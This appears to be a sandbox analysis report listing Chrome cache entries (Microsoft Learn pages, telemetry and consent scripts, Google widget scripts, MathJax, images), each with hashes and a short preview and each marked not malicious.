Preview:	{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"

Chrome Cache Entry: 572

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65410)
Category:	downloaded
Size (bytes):	207935
Entropy (8bit):	5.420780972514107
Encrypted:	false
SSDEEP:	3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
MD5:	3DE400B2682E30C3F33FA4B93116491F
SHA1:	BC48B898DF43BA2178DE28F5A29D977B2204F846
SHA-256:	84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
SHA-512:	D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
Malicious:	false
URL:	https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
Preview:	/!. 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e\|\|self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]\|\|{},d=(d=e)[l="oneDS"]=d[l]\|\|{},e=f[o]=f[o]\|\|{},p=e.v=e.v\|\|[],l=d[o]=d[o]\|\|{},g=l.v=l.v\|\|[];for(i in(l.o=l.o\|\|[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]\|\|(g[i]="---"),(u[r]=u[r]\|\|[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e\|\|t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]

Chrome Cache Entry: 573

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	47062
Entropy (8bit):	5.01634665936165
Encrypted:	false
SSDEEP:	768:haAC16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTCGLlO6eAbTIr4audZqBkZRLg
MD5:	82D67533B815A769FF4D2FA8FE5A14CD
SHA1:	6BE62ABD07ED34B22AF83A2B33817CC5033D3EA7
SHA-256:	D2D929B6E7E35013603F7B2B95551CF31F6DFEDF8F4CAF8F80D82222B675A5A1
SHA-512:	5F0AB5354A028F8A6B814D1C8F9A1924351C3D368E26C3EFDA422B5AA1D08A8006F90AD03E6926C80D5537DC2AD64D3ECC3E9427896DFA4354CC61CC4130C2A6
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=6ca8f7e5e2.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Preview:	<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st

Chrome Cache Entry: 574

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	18477
Entropy (8bit):	5.147347768532056
Encrypted:	false
SSDEEP:	384:cF3MGvRvqhjNLN1RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16z:63MGpvqhj/rlOVqnACpK3o3hhl0OU2/x
MD5:	9A6B01877BAAC986FE1FBF4CAA95E7C7
SHA1:	A3227894EACEB2177EEE7CF66A693A9B4C0971FE
SHA-256:	12051CF7967A2E3F39971EC7F48D1892EB7138F7D1F7E5A3407D63E257EBE7AC
SHA-512:	5DBDA31E67FE480385283A63F8C2D0CE5E1B2A04A23917F65F0EC6867A9D95C93E4B50807D42D65718EF01588AA523FE791A0A1BD0663BB5DC9BED5E43995AB2
Malicious:	false
URL:	https://learn.microsoft.com/en-us/banners/index.json
Preview:	{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"

Chrome Cache Entry: 575

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 576

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	15427
Entropy (8bit):	7.784472070227724
Encrypted:	false
SSDEEP:	384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
MD5:	3062488F9D119C0D79448BE06ED140D8
SHA1:	8A148951C894FC9E968D3E46589A2E978267650E
SHA-256:	C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
SHA-512:	00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0-....\|...X..s...Z.Y{....w..5.._s..x...E.......... ..................... ..................{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`......4..G.\|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...\|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

Chrome Cache Entry: 577

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2586)
Category:	downloaded
Size (bytes):	174097
Entropy (8bit):	5.554845848492248
Encrypted:	false
SSDEEP:	3072:49GysOAIZQy3ZZb6L5BfizRURkgq3ocEs7BB19HDKDSfEISlCMDyQhnF/VU9cpar:49G3IZP3ZZmHfiz+R7q3ocV7BB19HDKq
MD5:	292ACC11525E24B0501DEAC4EB7B61D4
SHA1:	4840E1B06489D1210E25C620AC0E4DEA33F4A574
SHA-256:	A5CB759FC6BF64DD1E35731C88899928B098A359EFF9CA5B34B91F23ADE02C2B
SHA-512:	FBDB4B2B4B647F734B6E05D0495CE1135E9536D611BC567A3B47353FEC986B92412153C214EFE776BC6391239076B3DA6B79851C8BE036C00E4AD026F88CC683
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.ciOLm-Jy21Y.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTvi2-a6fPowp_OrDQczHs8e8wA2zQ"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.ej=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var fj,gj,ij,lj,oj,nj,hj,mj;fj=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};gj=function(){_.Ka()};ij=function(){hj===void 0&&(hj=typeof WeakMap==="function"?fj(WeakMap):null);return hj};lj=function(a,b){(_.jj\|\|(_.jj=new hj)).set(a,b);(_.kj\|\|(_.kj=new hj)).set(b,a)};.oj=function(a){if(mj===void 0){const b=new nj([],{});mj=Array.prototype.concat.call([],b).length===1}mj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.pj=function(a,b,c){a=_.zb(a,b,c);return Array.isArray(a)?a:_.Kc};_.qj=function(a,b){a=(2&b?a\|2:a&-3)\|32;return a&=-2049};_.rj=function(a,b){a===0&&(a=_.qj(a,b));return a\|1};_.sj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.tj=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.xj=function(a,b,c,d,e,f,g){const h=a.ha;var k=!!(2&b);e=k?1:e;

Chrome Cache Entry: 578

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (52717), with no line terminators
Category:	dropped
Size (bytes):	52717
Entropy (8bit):	5.462668685745912
Encrypted:	false
SSDEEP:	1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
MD5:	413FCC759CC19821B61B6941808B29B5
SHA1:	1AD23B8A202043539C20681B1B3E9F3BC5D55133
SHA-256:	DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
SHA-512:	E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
Malicious:	false
Preview:	var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)\|\|Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

Chrome Cache Entry: 579

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (52717), with no line terminators
Category:	downloaded
Size (bytes):	52717
Entropy (8bit):	5.462668685745912
Encrypted:	false
SSDEEP:	1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
MD5:	413FCC759CC19821B61B6941808B29B5
SHA1:	1AD23B8A202043539C20681B1B3E9F3BC5D55133
SHA-256:	DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
SHA-512:	E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
Malicious:	false
URL:	https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
Preview:	var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)\|\|Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

Chrome Cache Entry: 580

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	exported SGML document, ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	1173007
Entropy (8bit):	5.503893944397598
Encrypted:	false
SSDEEP:	24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
MD5:	2E00D51C98DBB338E81054F240E1DEB2
SHA1:	D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
SHA-256:	300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
SHA-512:	B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
Malicious:	false
URL:	https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
Preview:	(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends\|\|(n=function(t,e){return n=Object.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}\|\|function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign\|\|function(){return i=Object.assign\|\|function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read\|\|function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e\|\|e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

Chrome Cache Entry: 581

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
Category:	dropped
Size (bytes):	33370
Entropy (8bit):	7.973675198531228
Encrypted:	false
SSDEEP:	768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
MD5:	6E78EE324E008296108BFCDECD77E318
SHA1:	F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
SHA-256:	EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
SHA-512:	BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
Malicious:	false
Preview:	......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A.$"3!h.~`>.....d+.,.a).Rb.I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.\|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..\|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..

Chrome Cache Entry: 582

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	133690
Entropy (8bit):	5.432738580466806
Encrypted:	false
SSDEEP:	1536:i7C/VNgk7Yp+GhGLhJgJoamyeX43zGiJsKtPLx8OF97f4qlgpCFlOve2dzAcJ82O:fV7vhSJjxeX431PBLx8OF9jxYsci2i6o
MD5:	25B553667BD3A3D69BE6891941456805
SHA1:	8E971FF6F3ED03361CC5897EE88775ADDE264F9C
SHA-256:	DFFE77BA17597312D456C68ABDEAA9169740B0D9C566F541273D3BC2CF64CDCD
SHA-512:	66BE28C36CDA09BCF1DDD4DB4C59DAE76A4B8408F4B35B286E94986B2BF1D5FE36B348A61E4E5E1D9234952AF5CA4AC1FE22432378CD620BAA5B103F02946C8B
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 583

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	13339
Entropy (8bit):	7.683569563478597
Encrypted:	false
SSDEEP:	192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
MD5:	512625CF8F40021445D74253DC7C28C0
SHA1:	F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
SHA-256:	1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
SHA-512:	AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....\|../5_.......T...~.y.'.'.\|...W..[...C.)......\|.[.[WK...w...w..y.{..\|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....\|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..\|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

Chrome Cache Entry: 584

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1302)
Category:	downloaded
Size (bytes):	117949
Entropy (8bit):	5.4843553913091005
Encrypted:	false
SSDEEP:	3072:D7yvvjOy7sipKTr3dH39oogNLLDzZzS7oF:D7yjOy7LS39mnhS7oF
MD5:	A5D33473ED0997C008D1C053E0773EBE
SHA1:	FEB4CB89145601A0141CC5869BEDF9AE7CD5CB80
SHA-256:	14C27BB0224FCF89A43B444B427DABE3D0AF184CAA7B6B4990CE228C51AE01C1
SHA-512:	3C0A48F9FA05469F950D9A268F1B3E9285A783A555EE597A2E203B688EB0FBCAEA3F4DE9BC8F5381C661007D0C6C4AFA70C19B7826D69A0E2A914A55973D14BD
Malicious:	false
URL:	"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0"
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);.var da,ea,ha,na,oa,sa,ta,wa;da=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);na=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r

Chrome Cache Entry: 585

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
URL:	https://learn.microsoft.com/favicon.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 586

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (46884)
Category:	dropped
Size (bytes):	1817110
Entropy (8bit):	5.501019337872714
Encrypted:	false
SSDEEP:	24576:w9NP9HVx3Yk4SB1DkCXWDlWn4EG72mht/e:wtHVx3Yk4SB1DkCXWDlW4EG72Ctm
MD5:	6344957212789863FA4B39721DAAFB40
SHA1:	5E496B5667B449507C1286741659964C74EEF639
SHA-256:	65411595AC128F02A7F850EF501D44958CC8B505A1C5B224773BCE4D36EFA5C5
SHA-512:	8287F99B9E0A7E67219C384DD4C97970BE1762E345E2665E0D397E04C60C414392DA6005CF2082B902D65433F48313900E5440FC51CEC8C40727637D242C25EE
Malicious:	false
Preview:	"use strict";(()=>{var hve=Object.create;var bT=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?bT(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t\|\|e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"\|\|typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&bT(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))\|\|n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t\|\|!e\|\|!e.__esModule?bT(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))\|\|r);return n&&r&&bT(t,o,r),r};var 